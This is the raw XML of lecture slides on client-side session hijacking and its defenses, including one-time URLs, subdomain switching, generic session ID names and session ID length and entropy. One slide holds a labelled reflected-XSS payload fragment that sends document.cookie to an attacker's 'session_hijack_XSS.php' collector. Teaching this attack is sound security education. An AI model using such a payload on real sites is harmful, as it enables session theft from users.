                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> .com/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>session_hijack_XSS.php?ck</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>=’ + document. cookie + ‘" &gt;’); &lt;/script &gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Vrinda"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2209800"/>
            <a:ext cx="6516806" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>An example of cookie stealing using reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1891093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Session stealing (hijacking) at the client side</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1447800"/>
            <a:ext cx="8153400" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cross-protocol attack to obtain cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web applications may rely on non-HTTP servers such as SMTP and FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Communication from HTTP-based web application to non-HTTP server is done with JavaScript code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker first create a website with a HTML page containing JavaScript code to set a cookie for a victim targeting a remote non-HTTP server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The action of the form is directed to the non-HTTP server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, the attacker uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>enctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> = “multipart/form-data”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value to bypass URL encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This causes the server to throw an error message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The victim’s browser receives the malicious script code, it is executed and result in setting the cookie value based on attacker provided inputs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3228186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762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Defense Technique: one time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="838200"/>
            <a:ext cx="8382000" cy="3124200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>One-Time URL:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attach a secret component to a URL that cannot be guessed, or obtained by an attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server is set to only respond to URLS that have this secret component attached to the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secret component must satisfy the conditions: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can’t be stored in an HTML element. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can’t be stored in public JavaScript variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can’t be hard coded in JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only used or valid for one time use. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL must contain a valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>rnonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parameter to be authorized</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3092594667"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1447800" y="4120759"/>
          <a:ext cx="6781800" cy="2194560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6781800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;?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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>require_once</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(“user/libs/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>one_time_url.lib.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>”);</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    $</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>one_time_url</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>one_time_url</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>();</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>?&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>href</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = “</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>   &lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>      echo $</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>one_time_url</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>make_url</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>http://www.kennesaw-web.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>); </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>   ?&gt;”&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;/a&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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5" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1994848" y="6314953"/>
            <a:ext cx="509684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itchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example of PHP code for applying One-Time URL.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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7150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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Defense Technique: Subdomain Switching</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1066800"/>
            <a:ext cx="8001000" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Subdomain Switching</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webpages that contain same origin implicitly trust one another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This allows attackers inserting scripts in pages that may otherwise not be vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Programming webpages to explicitly trust each other is the key to successful subdomain switching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All links that are included in a webpage must direct them to a URL with a subdomain that is different from the domain in the containing webpage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, webpages loaded from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://z1.www.page.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> only has links to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://z2.www.page.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And, links from this page go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://z3.www.page.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and so on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1921525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Avoid fingerprinting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="8153400" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The session ID used by web application development frameworks can be easily fingerprinted </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHPSESSID (PHP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSESSIONID (J2EE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CFID &amp; CFTOKEN (ColdFusion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ASP.NET_SessionId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (ASP .NET)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session ID name can disclose the technologies and programming languages used by the web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is recommended to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change the default session ID name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of the web development framework to a generic name, such as “id”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="898384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Web application communication mechanism</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8305800" cy="2590800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A web application located at the server side interacts with the browser based on Hyper Text Transfer (HTTP) protocol </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTTP is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stateless protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>establish sessions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>between the client and server-sides to relate the context of requested functionalities from users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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810000"/>
            <a:ext cx="5334000"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2545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200" dirty="0"/>
              <a:t>Defense technique: Session id length</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The session ID must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>long enough </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to prevent brute force attacks, where an attacker can go through the whole range of ID values and verify the existence of valid sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The session ID length must be at least 128 bits (16 bytes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2997195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Longer Session id entropy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="8153400" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session ID Entropy: information content (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>more random elements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
